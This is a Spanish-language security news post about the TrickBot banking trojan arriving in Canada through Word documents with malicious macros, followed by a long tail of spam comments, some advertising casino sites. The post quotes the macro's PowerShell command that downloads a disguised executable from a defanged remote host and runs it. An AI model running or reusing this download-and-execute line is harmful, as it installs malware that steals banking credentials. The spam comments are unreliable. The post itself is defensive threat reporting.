Hasta
ahora encontrábamos el troyano bancario TrickBot como
un binario aislado, pero abandona su comportamiento para seguir un modus operandi más habitual de éste tipo
de amenazas. Además, cabe destacar que a pesar de comenzar en Australia y avanzar cruzar el charco hasta Europa, esta vez ha llegado a Canadá.
Captura del documento de Word que solicita habilitar el contenido
Esta vez, encontramos un documento de Word el cual nos pide que habilitemos la edición y el contenido, de esta manera permitiendo que se ejecuten las macros incluidas dentro del documento de Word.
Esta macro, lanza a través de Powershell la descarga de un archivo remoto .png, que a pesar de su extensión no es una imagen...
PowerShell (New-Object
System.Net.WebClient).DownloadFile('hxxp://wingsbiotech.com/kufma/sdogsodngsdlk.png','C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe');Start-process
'C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe';
Tras la descarga de la falsa
iagen ".png", se almacena en %temp% para posteriormente ser ejecutado
con una llamada a start-process
Una vez lograda la infección, comienza a conectarse a servidores remotos para descargar la configuración necesaria para su funcionamiento (tal y como vimos en la anterior una-al-día).
Esta vez, además de a los
clientes de las entidades ya mencionadas se suman a la lista de afectados
Santander UK y a BMO, conocido como "Bank of Montreal" (Canadá).
Recuerda que si recibes un
documento por parte de un desconocido no debes abrirlo. A esto debemos añadir,
que no se deben habilitar posibles ejecuciones de contenido en documentos de
Office cuando el destinatario de este es desconocido, para evitar este tipo de
amenazas.
Más información:
una-al-dia (07/11/2016) El
troyano bancario TrickBot azota a Europa
Fernando Díaz
Este comentario ha sido eliminado por el autor.
ResponderEliminarGood Article..
ResponderEliminarGreat article.
ResponderEliminarI love your blog
ResponderEliminarAmazing article
ResponderEliminari really like your blog
ResponderEliminarI Love it
ResponderEliminarAmazing Blog
ResponderEliminarNice, i love your blog
ResponderEliminari like your article
ResponderEliminarwoow amazing, i like yout article
ResponderEliminarkeren banget artikelnya
ResponderEliminarMantap bro
ResponderEliminarNice info
ResponderEliminarAmazing
ResponderEliminarNice blog, thak you for sharing
ResponderEliminarI love it
ResponderEliminarmantap
ResponderEliminarCool
ResponderEliminarMantap articlenya
ResponderEliminarhttp://maritimtours.com/tanjung-lesung/
Nice article
ResponderEliminarAmazing
ResponderEliminarMantap
ResponderEliminarkeren banget
ResponderEliminarcool
ResponderEliminarKeren...
ResponderEliminarMantap blognya
ResponderEliminarMakasih udah sharing
ResponderEliminarartikel yang menarik
ResponderEliminarit's good to use video, so it's easy to understand
ResponderEliminarnice tutorial,
ResponderEliminarThank's for your sharing
ResponderEliminarnice article, nice tutorial, thank's for your sharing article
ResponderEliminarnice tutorial
ResponderEliminarit's good to use video, so it's easy to understand
ResponderEliminarnice post very interest
ResponderEliminarNice post, thanks for sharing
ResponderEliminarthank's for your sharing article
ResponderEliminarMany thanks for sharing
ResponderEliminarThank you so much for sharing
ResponderEliminarTerima kasih atas informasi yang menarik ini.
ResponderEliminarMany thanks for sharing
ResponderEliminarThanks for sharing such a great article with us Thanks a lot.
ResponderEliminarลิงค์รับทรัพย์
Positive site, Read articles on this website, I really like your style. Thanks 카지노사이트
ResponderEliminarContinue sharing such an excellent post. Glad that I found this, Thankyou.온라인카지노
ResponderEliminarContinue for sharing such a excellent post here. Keep on sharing, Cheers 카지노사이트탑
ResponderEliminarThis is a tremendous post Keep up the great work. Sharing is nice keep it up 카지노사이트킹
ResponderEliminar